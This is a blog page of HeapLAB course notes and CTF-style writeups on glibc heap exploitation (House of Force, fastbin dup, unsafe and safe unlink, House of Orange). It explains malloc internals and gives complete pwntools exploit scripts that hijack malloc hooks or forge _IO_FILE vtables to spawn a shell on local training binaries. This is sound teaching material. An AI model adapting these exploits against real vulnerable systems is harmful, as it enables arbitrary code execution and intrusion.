Back Original

HeapLAB

Below are some of my notes and challenge writeups for Max Kamper’s excellent HeapLAB course.

This page will be updated with more challenges in the future.

House of Force

This technique comes from Phantasmal Phantasmagoria’s Malloc Maleficarum, one of the most seminal early works in pwning Glibc malloc (and the reason so many heap exploits are called “House of XYZ”).

In Glibc, malloc requests for memory are serviced from the top chunk (aka the wilderness). Because heap metadata is stored in-line (the size of a chunk occupies the first 8 bytes of every chunk, just before the address returned from malloc), if we have a heap overflow we can clobber this metadata and create a huge top chunk; so huge in fact that it wraps around the virtual address space to an address before the start of the top chunk. Then we can request a massive chunk from malloc that stops just short of our target address such that the first 8 bytes of the (new) top chunk reside at the target address. Use the same heap overflow as before and we’ve overwritten the target value!

Solve

The vulnerability in this binary is that read uses the size of the chunk (returned by malloc_usable_size), not the size of the user’s data, resulting in an 8 byte overflow if we request CHUNK_SIZE-8 bytes from malloc (this is the maximum size of user data that can fit in a chunk of size CHUNK_SIZE).

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("house_of_force")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size, data):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"heap @ ")
heap = int(proc.recvline(), 16)
proc.recvuntil(b"> ")

info(f"heap: 0x{heap:02x}")
proc.timeout = 0.5

malloc(0x20-8, b"A"*(0x20-8) + p64(0xffffffffffffffff))
# we're calculating the distance between the end of the previous chunk and the address exactly one chunk away (0x20 bytes) from __malloc_hook, so that the next chunk we allocate will overwrite __malloc_hook
# also we have a heap leak so put /bin/sh on the heap
malloc((libc.sym.__malloc_hook-0x20) - (heap+0x20), b"/bin/sh\x00")
malloc(0x20-8, p64(libc.sym.system))
# the size of the chunk gets passed to __malloc_hook, so we will allocate &"/bin/sh\x00" bytes
malloc(heap+0x20+0x8+0x8, b"")

proc.sendline(b"id")
print(proc.recvall(timeout=0.1))
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'

Fastbin dup

This time the vuln is a nice and simple double free: free doesn’t check if an index was previously freed, so we can free a previously malloc​ed chunk as many times as we want.

Before we move on let’s talk about in-band (stored on the heap) vs out-of-band (stored somewhere besides the heap) heap metadata. We saw previously that the size of a chunk is stored in the chunk itself, but how does malloc know where e.g. the top chunk is in order to service a request? A heap arena is a data structure that does all of the necessary bookkeeping for the heap, or more accurately a heap. When a program has multiple threads, it would be inefficient to have to contend for a lock for every allocation/free, so each thread (up to a limit) gets their own slice of the heap (the section of program memory) governed by their own heap arena.

C
1655
1656
1657
1658
1659
1660
1661
1662
1663
1664
1665
1666
1667
1668
1669
1670
1671
1672
1673
1674
1675
1676
1677
1678
1679
1680
1681
1682
1683
1684
1685
1686
1687
1688
1689
1690
1691
1692
1693
1694
1695
1696
1697
struct malloc_state
{
  /* Serialize access.  */
  __libc_lock_define (, mutex);

  /* Flags (formerly in max_fast).  */
  int flags;

  /* Set if the fastbin chunks contain recently inserted free blocks.  */
  /* Note this is a bool but not all targets support atomics on booleans.  */
  int have_fastchunks;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c.  */
  struct malloc_state *next_free;

  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c.  */
  INTERNAL_SIZE_T attached_threads;

  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};

The important bit of metadata we care about here are the fastbins. As an optimization for small (and therefore frequent) allocations, for chunk sizes within the first NFASTBINS multiples of the smallest chunk size, freeing a chunk of this size adds it to a corresponding singly linked list (and the heads of these linked lists are stored in fastbinsY). And while the heads of the linked lists are stored in the arena, subsequent pointers are stored in-line in the chunks themselves, overlapping with where user data normally goes.

I like to think of a chunk like this:

C
struct fastbin_chunk_0x20 {
  union {
    struct {
      size_t _size : 61;
      unsigned int non_main_arena : 1;
      unsigned int is_mmapped : 1;
      unsigned int prev_inuse : 1;
    };
    size_t size;
  };
  union {
    struct {
      fastbin_chunk_0x20* fd;
      char _reserved[0x20-8-8];1
    } free;
    struct {
      char data[0x20-8];
    } inuse;
  };
};

Combining this knowledge with our double free, we could free chunk A twice, causing it to be added to the corresonding fastbin freelist twice; then we could malloc chunk B of the same size as A, and the first 8 bytes of the user accessible data of chunk B that malloc returns will still be interpreted as a fd pointer for the next occurence of chunk A (the one that’s still in the freelist). Then we could corrupt this fd pointer and when we allocate another chunk C, malloc will return a chunk at wherever the corrupted fd points.

As an additional complication, we can’t actually just allocate chunk A and then free it twice, because malloc checks if the chunk we’re adding to the freelist is the same chunk that’s at the head of the freelist:

C
3592
3593
3594
size_t victim_idx = fastbin_index (chunksize (victim));
if (__builtin_expect (victim_idx != idx, 0))
    malloc_printerr ("malloc(): memory corruption (fast)");

This is trivially bypassed by freeing a different chunk in between the two free​s of chunk A.

Solve

There are a few complications to address when actually writing the exploit.

We have a libc leak again so malloc hooks (particularly __malloc_hook and __free_hook) are viable targets. However, because this time we’re allocating a fake chunk from a corrupted freelist pointer, the 16 bytes before our target must be valid metadata for a freed chunk.

__free_hook is surrounded by zeroes so it’s a no-go, but __malloc_hook is a different story:

Instead of putzing around with finding a good alignment ourselves, we can let pwndbg do it for us:

But a size field of 0xf8 is larger than that of the largest chunk’s fastbin (0x80). The values of _IO_wide_data_0+240 differ between my aarch64-linux NixOS VM (running the binary with QEMU/Rosetta) and the intended x86_64-linux Ubuntu VM, so this approach won’t work for my setup specifically.

The same is also true for trying FSOP, as we can’t create a fake chunk in __GI__IO_file_jumps.

We’ll soon discuss a very interesting method of using the fastbin dupe to corrupt main_arena’s top_chunk pointer, but that requires more allocations than the 7 we’re permitted here, so we’ll settle for overwriting the target for now.

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("fastbin_dup")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size, data):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.sendafter(b"Enter your username: ", p64(0x20))

proc.recvuntil(b"> ")
proc.timeout = 0.5

proc.send(b"3")
proc.recvline()
print(proc.recvline())

# 0x20 freelist: NULL
malloc(0x20-8, b"A")
malloc(0x20-8, b"B")
free(0)
# 0x20 freelist: [chunk A] -> NULL
free(1)
# 0x20 freelist: [chunk B] -> [chunk A] -> NULL
free(0)
# 0x20 freelist: [chunk A] -> [chunk B] -> [chunk A] -> NULL
malloc(0x20-8, p64(elf.sym.user-8)) # chunk C
# 0x20 freelist: [chunk B] -> [chunk A] -> &user
malloc(0x20-8, b"D")
# 0x20 freelist: [chunk A] -> &user
malloc(0x20-8, b"E")
# 0x20 freelist: &user
malloc(0x20-8, b"F"*8 + b"pwned")

proc.send(b"3")
proc.recvline()
print(proc.recvline())
b'target: XXXXXXX\n'
b'target: pwnedXX\n'

Challenge solve

So I hinted that there’s a way to corrupt main_arena’s top_chunk pointer to achieve a truly arbitrary write, and indeed we’ll do just that.

The basic idea is that we have an arbitrary write over the fastbin head pointers; most values don’t point to valid freed fastbin chunks and will therefore crash during the integrity checks when allocating from that fastbin, but what if we used that value to create a fake free fastbin cache inside main_arena? Then we could use another fastbin dupe to clobber the top chunk pointer, which is convenient because allocations serviced from the top chunk are not subject to the same strict size integrity checks as fastbin chunks!

By settings the the top pointer to just before __malloc_hook (with some misalignment introduced to ensure the fake top chunk has a valid size field), we can jump to a one_gadget when we next call malloc:

Bash
one_gadget $(patchelf --print-rpath fastbin_dup_2)/libc.so.6
0xc4dbf execve("/bin/sh", r13, r12)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xc4ddf execve("/bin/sh", rbp-0x40, r12)
constraints:
  address rbp-0x38 is writable
  rdi == NULL || {"/bin/sh", rdi, NULL} is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xc4de6 execve("/bin/sh", rbp-0x40, r12)
constraints:
  address rbp-0x38 is writable
  rax == NULL || {rax, rdi, NULL} is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xe1fa1 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv

As it happens we control the contents of [rsp+0x50], which we can set to a string that prevents further argument processing; "-s" does the trick for dash​/​bash.

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("fastbin_dup_2")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size, data):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"> ")
proc.timeout = 0.5

one_gadget = libc.address + 0xe1fa1

# 0x80 freelist: NULL
malloc(0x20-8, b"A")
malloc(0x20-8, b"B")
free(0)
# 0x20 freelist: [chunk A] -> NULL
free(1)
# 0x20 freelist: [chunk B] -> [chunk A] -> NULL
free(0)
# 0x20 freelist: [chunk A] -> [chunk B] -> [chunk A] -> NULL
malloc(0x20-8, p64(0x60)) # chunk C
# 0x20 freelist: [chunk B] -> [chunk A] -> 0x60
malloc(0x20-8, b"D")
# 0x20 freelist: [chunk A] -> 0x60
malloc(0x20-8, b"E")
# 0x20 freelist: 0x60

malloc(0x60-8, b"F")
malloc(0x60-8, b"G")
free(5)
# 0x60 freelist: [chunk F] -> NULL
free(6)
# 0x60 freelist: [chunk G] -> [chunk F] -> NULL
free(5)
# 0x60 freelist: [chunk F] -> [chunk G] -> [chunk F] -> NULL
malloc(0x60-8, p64(libc.sym.main_arena+8)) # chunk H
# 0x60 freelist: [chunk F] -> [chunk G] -> &main_arena
malloc(0x60-8, b"-s\x00") # chunk I, lives at rsp+0x50 when __malloc_hook is executed
# 0x60 freelist: [chunk G] -> &main_arena
malloc(0x60-8, b"J")
# 0x60 freelist: &main_arena
malloc(0x60-8, b"\x00"*0x48 + p64(libc.sym.__malloc_hook-0x1c-8))
# main_arena.top_chunk = &__malloc_hook-0x10
malloc(0x80-8, b"L"*20 + p64(one_gadget)) # chunk L
# __malloc_hook = &one_gadget
malloc(0x2d, b"") # chunk M
# __malloc_hook triggered

proc.sendline("id")
print(proc.recvline())
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'

When a “normal” chunk is freed, it is added to the unsortedbin doubly linked list; this behaves very similarly to the fastbins, except there’s now an additional bk pointer stored after the fd pointer.

But having a bunch of randomly sized chunks in a freelist is not really ideal, as we’d like to be able to reclaim these chunks and use them for even larger allocations. Enter chunk consolidation—when a chunk is freed, malloc will check if the chunk’s neighboring chunks are also freed, in which case malloc will backwards and/or forwards consolidate the chunks into a single larger chunk. But a freed chunk is still inside the unsortedbin we talked about earlier, so before this consolidation can occur malloc has to unlink one or more nodes from the unsortedbin linked list (as the chunk being freed is merged with one or both of its neighboring chunks).

In older versions of Glibc this linked list unlinking was not performed safely, so by corrupting heap chunks one could leverage this chunk consolidation for a (somewhat constrained) reflected write.2

Solve

In this challenge we can write 8 bytes past the end of our requested size, which we can use to corrupt the next chunk’s size field and flags.

By clearing chunk B’s prev_inuse flag, we can convince malloc that the chunk before chunk B (chunk A) is freed for the purposes of chunk consolidation when chunk B is freed. When we free chunk B, malloc will attempt to unlink chunk A from the unsortedbin freelist by setting chunk_a.bk->fd = chunk_a.fd and chunk_a.fd->bk = chunk_a.bk (using temporary variables where appropriate):

C
1413
1414
1415
1416
1417
1418
1419
1420
1421
1422
1423
1424
1425
1426
1427
1428
1429
1430
1431
1432
1433
1434
#define unlink(AV, P, BK, FD) {\
    FD = P->fd;\
    BK = P->bk;\
    FD->bk = BK;\
    BK->fd = FD;\
    if (!in_smallbin_range (P->size)\
        && __builtin_expect (P->fd_nextsize != NULL, 0)) {\
            if (FD->fd_nextsize == NULL) {\
                if (P->fd_nextsize == P)\
                  FD->fd_nextsize = FD->bk_nextsize = FD;\
                else {\
                    FD->fd_nextsize = P->fd_nextsize;\
                    FD->bk_nextsize = P->bk_nextsize;\
                    P->fd_nextsize->bk_nextsize = FD;\
                    P->bk_nextsize->fd_nextsize = FD;\
                }\
            } else {\
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;\
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;\
            }\
    }\
}

With that in mind the exploit is pretty straightforward. Unfortunately I can’t use the OG method of writing shellcode on the heap because in QEMU/Rosetta the heap isn’t marked executable (even though the stack is—weird), and we can’t use a one_gadget because Glibc .text isn’t writable:

[*] './unsafe_unlink'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    RUNPATH:    b'../.glibc/glibc_2.23_unsafe-unlink'
    Stripped:   No
    Debuginfo:  Yes
Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("unsafe_unlink")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.recvuntil(b"> ")

def edit(index, data):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"3")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"heap @ ")
heap = int(proc.recvline(), 16)

proc.recvuntil(b"> ")
proc.timeout = 0.5

shellcode = flat(
    asm("jmp .+18"),
    p64(0),
    p64(0),
    asm(shellcraft.amd64.linux.sh())
)
# start of the heap plus the size, fd, and bk fields of chunk A
shellcode_addr = heap + 8 + 8 + 8 + 8

malloc(0x3f0-8) # chunk A
malloc(0x3f0-8) # chunk B
edit(0, p64(libc.sym.__free_hook-0x18) + p64(shellcode_addr) + shellcode + b"A"*(0x3f0-8-8-len(shellcode)-8-8) + p64(0x3f0) + p64((0x3f0) & ~0b111))
free(1) # trigger unlink of chunk A

free(0) # trigger __free_hook

proc.sendline(b"id")
print(proc.recvall())

This is effectively the same as unsafe unlink, except now integrity checks have been introduced to the unlinking process that thwart our previous approach:

C
1449
1450
1451
1452
1453
1454
1455
1456
1457
1458
1459
1460
1461
1462
1463
1464
1465
1466
1467
1468
1469
1470
1471
1472
1473
1474
1475
1476
1477
1478
1479
1480
1481
1482
1483
1484
1485
1486
1487
1488
/* Take a chunk off a bin list.  */
static void
unlink_chunk (mstate av, mchunkptr p)
{
  if (chunksize (p) != prev_size (next_chunk (p)))
    malloc_printerr ("corrupted size vs. prev_size");

  mchunkptr fd = p->fd;
  mchunkptr bk = p->bk;

  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
    malloc_printerr ("corrupted double-linked list");

  fd->bk = bk;
  bk->fd = fd;
  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
    {
      if (p->fd_nextsize->bk_nextsize != p
	  || p->bk_nextsize->fd_nextsize != p)
	malloc_printerr ("corrupted double-linked list (not small)");

      if (fd->fd_nextsize == NULL)
	{
	  if (p->fd_nextsize == p)
	    fd->fd_nextsize = fd->bk_nextsize = fd;
	  else
	    {
	      fd->fd_nextsize = p->fd_nextsize;
	      fd->bk_nextsize = p->bk_nextsize;
	      p->fd_nextsize->bk_nextsize = fd;
	      p->bk_nextsize->fd_nextsize = fd;
	    }
	}
      else
	{
	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
	}
    }
}

Basically, the addresses we’re writing to actually need to point to our chunk, which severely limits our options. But as it turns out, unlink_chunk can still be leveraged for an arbitrary write, but in a way that’s very specific to our target binary.

Solve

In our binary there exists a global variable m_array that has pointers to the chunks we’re allocating on the heap.

We can craft a fake freed chunk A with fd and bk pointers that point to m_array[0], which in turn points back to chunk A, thus passing the integrity checks. As an additional complication we can’t free chunk A as-is, but that’s fine—we can create a smaller fake chunk within chunk A and use that.

This has the effect of clobbering m_array[0].user_data to point to itself; when we try to edit chunk A, we’re actually editing m_array[0]. From there we can overwrite m_array[0].user_data to point to __free_hook, and edit “chunk A” once more to write a one_gadget.

Or so I thought, but as it turns out I couldn’t satisfy any of the conditions of the one_gadgets, even with rdi​/​[rdi] or rax control (by clobbering m_chunk[1].user_data). But if we have an arbitrary write, we can just write "/bin/sh" at the start of our fake chunk and set __free_hook to system, nice and simple.

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("safe_unlink")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size):
    proc.send(b"1")
    proc.sendafter(b"size: ", f"{size}".encode())
    proc.recvuntil(b"> ")

def edit(index, data):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"3")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"> ")
proc.timeout = 0.5

malloc(0xa0-8) # chunk A
malloc(0x90-8) # chunk B
edit(0, p64(0) + p64(0x91) + p64(elf.sym.m_array-0x18) + p64(elf.sym.m_array-0x10) + b"A"*(0x90-8-8-8-8) + p64(0x90) + p64((0x90) & ~0b111))
free(1) # trigger unlink of chunk A
# m_array[0].user_data = &m_array[0].user_data-0x18
edit(0, b"\x00"*0x18 + p64(libc.sym.__free_hook - len(b"/bin/sh\x00")))
# m_array[0].user_data = &__free_hook-8
edit(0, b"/bin/sh\x00" + p64(libc.sym.system))
free(0) # trigger __free_hook with address to "/bin/sh" as argument

proc.sendline(b"id")
print(proc.recvline())
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'

House of Orange

Fast forward to 2016 when the House of Orange technique was introduced at HITCON CTF Quals. This attack is a bit convoluted as it relies on internals of _IO_FILE for a specific version of Glibc, but the technique has pedagogical value for learning FSOP and the unsortedbin attack.

The prescient bit of information is that we can write the head of the unsortedbin (the first bin in main_arena.bins) freelist to an arbitrary address, where main_arena.bins[0] == &tail_of_unsortedbin. There doesn’t seem to be an immediately obvious utility aside from leaking a libc address, but we can sneakily replace a different linked list head in Glibc with the head of the unsortedbin linked list.

The big non-heap candidate here is _IO_list_all, which is a linked list of _IO_FILE structures for stdio (stdin/stdout/stderr). In a similar vein to the malloc hooks, _IO_FILE (or technically _IO_FILE_plus) has a vtable pointer that could be clobbered, and just like malloc hooks, we can reliably trigger execution of one or more functions in this vtable (_IO_flush_all_lockp will traverse all the files in _IO_list_all and execute each _IO_FILE’s __overflow method; we can trigger this by intentionally failing a heap corruption check, which will abort which eventually calls _IO_flush_all_lockp).

C
struct _IO_FILE {
  int                  _flags;
  char *               _IO_read_ptr;
  char *               _IO_read_end;
  char *               _IO_read_base;
  char *               _IO_write_base;
  char *               _IO_write_ptr;
  char *               _IO_write_end;
  char *               _IO_buf_base;
  char *               _IO_buf_end;
  char *               _IO_save_base;
  char *               _IO_backup_base;
  char *               _IO_save_end;
  struct _IO_marker * _markers;
  struct _IO_FILE *   _chain;
  int                 _fileno;
  int                 _flags2;
  __off_t             _old_offset; // __off_t == long int
  unsigned short      _cur_column;
  signed char         _vtable_offset;
  char                _shortbuf[1];
  _IO_lock_t *        _lock;
};

struct _IO_FILE_complete {
  struct _IO_FILE _file;
  __off64_t       _offset;
  void *          __pad1;
  void *          __pad2;
  void *          __pad3;
  void *          __pad4;
  size_t          __pad5;
  int             _mode;
  char            _unused2[20];
};

struct _IO_jump_t {
  size_t           __dummy;
  size_t           __dummy2;
  /* these are all function pointers */
  _IO_finish_t     __finish;
  _IO_overflow_t   __overflow;
  _IO_underflow_t  __underflow;
  _IO_underflow_t  __uflow;
  _IO_pbackfail_t  __pbackfail;
  _IO_xsputn_t     __xsputn;
  _IO_xsgetn_t     __xsgetn;
  _IO_seekoff_t    __seekoff;
  _IO_seekpos_t    __seekpos;
  _IO_setbuf_t     __setbuf;
  _IO_sync_t       __sync;
  _IO_doallocate_t __doallocate;
  _IO_read_t       __read;
  _IO_write_t      __write;
  _IO_seek_t       __seek;
  _IO_close_t      __close;
  _IO_stat_t       __stat;
  _IO_showmanyc_t  __showmanyc;
  _IO_imbue_t      __imbue;
};

struct _IO_FILE_plus {
  struct _IO_FILE_complete  file;
  const struct _IO_jump_t * vtable;
};

Solve

There are three “phases” to our House of Orange attack (phases two and three happen at the same time but I think it’s helpful to mentally separate them):

  1. Clobber top chunk’s size field to a small page-aligned value and request a chunk larger than the top chunk can service. This causes malloc to call sbrk for a new top chunk that can service the request, and the old top chunk is added to the unsortedbin freelist (it doesn’t get extended/consolidated because the new top chunk is not contiguous with the old one).
  2. Overwrite the old top chunk’s bk pointer to 16 bytes before _IO_list_all; when we next request a chunk, _IO_list_all will be clobbered with main_arena.bins[0]-0x10 (aka the head of the unsortedbin freelist).
  3. In addition to overwriting the old top chunk’s bk pointer, also construct a fake _IO_FILE_plus (and stuff in a _IO_jump_t somewhere) that coincides with the old top chunk. There will be a few very basic checks against our fake _IO_FILE_plus, so be sure to pass those. This has the secondary effect of corrupting the heap, which will call (fake_filep->vtable.__overflow)(&fake_filep, -1); because fake_filep->vtable.__overflow is set to system and flags is set to "/bin/sh" (flags is the first member of _IO_FILE, so &fake_filep == &fake_filep.flags), this calls system("/bin/sh").
Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("house_of_orange")
libc = ELF(elf.runpath + b"/libc.so.6")

def malloc(size):
    if size == 0x18:
        proc.send(b"1")
    elif size == 0xfc0:
        proc.send(b"2")
    else:
        raise Exception("size must be 0xfc0 (large) or 0x18 (small)")
    proc.recvuntil(b"> ")

def edit(data):
    if len(data) > 0xf0:
        raise Exception("data cannot be larger than 0xf0 bytes")
    proc.send(b"3")
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

proc = remote("localhost", 1337)

proc.recvuntil(b"puts() @ ")
libc.address = int(proc.recvline(), 16) - libc.sym.puts

proc.recvuntil(b"heap @ ")
heap = int(proc.recvline(), 16)

proc.recvuntil(b"> ")
proc.timeout = 0.5

fake_vtable = flat(
    p64(0),
    p64(0),
    p64(0xcafebabe),
    p64(libc.sym.system),
)
fake_filep = flat(
    b"/bin/sh\x00", # _flags / old_top_chunk.prev_size
    p64(0x60 | 0b1), # _IO_read_ptr / old_top_chunk.size
    p64(0),
    p64(libc.sym._IO_list_all-0x10), # old_top_chunk.bk
    p64(1), # _IO_write_base
    p64(2), # _IO_write_ptr
    fake_vtable,
    b"\x00"*(0xc0-0x30-len(fake_vtable)),
    p32(0), # _mode
    b"\x00"*20,
    p64(heap+0x20+0x30), # vtable
)

# phase 1: turn top chunk into a small chunk and add it to the unsortedbin
malloc(0x20-8)
edit(b"A"*0x18 + p64((0x1000-0x20) | 0b001)) # clobber top chunk's size
malloc(0xfc0) # allocate a chunk large enough to brk a new top chunk and free the old one
# unsortedbin: [old_top_chunk, size: 0xfc0, fd: &main_arena.bins[0], bk: &main_arena.bins[0]]

# phase 3: fake _IO_FILE_plus with malicious vtable
edit(b"A"*0x10 + fake_filep)
# unsortedbin: [old_top_chunk, size: 0x18, fd: NULL, bk: &main_arena-0x10]
# phase 2: unsortedbin attack to clobber _IO_list_all to point to fake _IO_FILE_plus
malloc(0x20-8) # serviced from the unsortedbin, results in old_top_chunk.bk->fd = &old_top_chunk

proc.sendline(b"id")
print(proc.recvline())
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'

Challenge solve

There are two main differences from the previous challenge.

First, we can only allocate chunks of size 0x60, so the chunk we use for the unsortedbin attack must be of size 0x68 instead; this will still fit in the 0x60 smallbin, but will avoid _int_malloc’s fastpath that avoids binning when the chunk in the unsortedbin is an exact match for the requested size.

C
3519
3520
3521
3522
3523
3524
3525
3526
3527
3528
3529
3530
/* Take now instead of binning if exact fit */

if (size == nb)
{
    set_inuse_bit_at_offset (victim, size);
    if (av != &main_arena)
    victim->size |= NON_MAIN_ARENA;
    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
}

Second, instead of a very generous heap overflow we can only overflow the first byte of the next chunk’s size field (and flags). Instead of clobbering the top chunk’s size field like we did last time, we can allocate two chunks next to each other, double the first chunk’s size, free this large chunk to put a 0xc0 sized chunk in the unsortedbin freelist and finally allocate a new 0x60 chunk to split the tail of the unsortedbin into two 0x60 sized chunks (the first of which is used to service the request). This results in a UAF of the second chunk, which we can use to clobber unsortedbin linked list pointers (and ultimately leak libc/heap pointers and perform an FSOP attack).

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("one_byte")
libc = ELF(elf.runpath + b"/libc.so.6")

def calloc(size):
    if size != 0x58:
        raise Exception("size must be 0x58")
    proc.send(b"1")
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

def edit(index, data):
    if len(data) > 0x59:
        raise Exception("data cannot be larger than 0x59 bytes")
    proc.send(b"3")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def read(index):
    proc.send(b"4")
    proc.sendafter(b"index: ", f"{index}".encode())
    ret = proc.recvline().strip()
    proc.recvuntil(b"> ")
    return ret

proc = remote("localhost", 1337)

proc.recvuntil(b"> ")
proc.timeout = 0.5


calloc(0x60-8) # chunk A
calloc(0x60-8) # chunk B
calloc(0x60-8) # chunk C
calloc(0x60-8) # chunk D
calloc(0x60-8) # chunk E
calloc(0x60-8) # chunk F
calloc(0x60-8) # chunk G
calloc(0x60-8) # chunk H; protects other chunks against consolidation with top chunk
edit(0, b"A"*0x58 + p8(0xc0 | 0b1)) # make chunk B completely overlap chunk C
edit(3, b"D"*0x58 + p8(0xc0 | 0b1)) # make chunk E overlap chunk F
free(1) # free chunk B
# unsortedbin: [chunk B (+ C), size: 0xc0, fd: &main_arena.top, bk: &main_arena.top]
calloc(0x60-8) # chunk I; service this request from the tail of the unsortedbin, causing it to be split in two
# unsortedbin: [chunk C, size: 0x60, fd: &main_arena.top, bk: &main_arena.top]

# leaks
libc.address = u64(read(2)[:8]) - (libc.sym.main_arena+0x58)
free(4)
# unsortedbin: [chunk E (+ F), size: 0xc0, fd: &chunk_c, bk: &main_arena.bins[0]-0x10] -> [chunk C, size: 0x60, fd: &main_arena.bins[0]-0x10, bk: &chunk_e]
heap = u64(read(2)[8:16]) - 0x180
calloc(0x60-8) # chunk J
# unsortedbin: [chunk E (+ F), size: 0xc0, fd: &main_arena.bins[0]-0x10, bk: &main_arena.bins[0]-0x10]
calloc(0x60-8) # chunk K
# unsortedbin: [chunk F, size: 0x60, fd: &main_arena.bins[0]-0x10, bk: &main_arena.bins[0]-0x10]

# construct fake file
fake_vtable = flat(
    p64(0),
    p64(0),
    p64(0xcafebabe),
    p64(libc.sym.system),
)
edit(10, b"K"*0x50 + b"/bin/sh\x00" + p8(0x68 | 0b1))
edit(5, flat(
    p64(0),
    p64(libc.sym._IO_list_all-0x10), # chunk_f.bk
    p64(1), # _IO_write_base
    p64(2), # _IO_write_ptr
    fake_vtable,
))
edit(6, flat(
    b"\x00"*(0xc0-8-0x68),
    p32(0), # _mode
))
edit(7, flat(
    b"\x00"*(20-0x8-4),
    p64(heap+0x210), # vtable
))
calloc(0x60-8) # chunk L; carry out unsortedbin attack

proc.sendline(b"id")
print(proc.recvline())
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'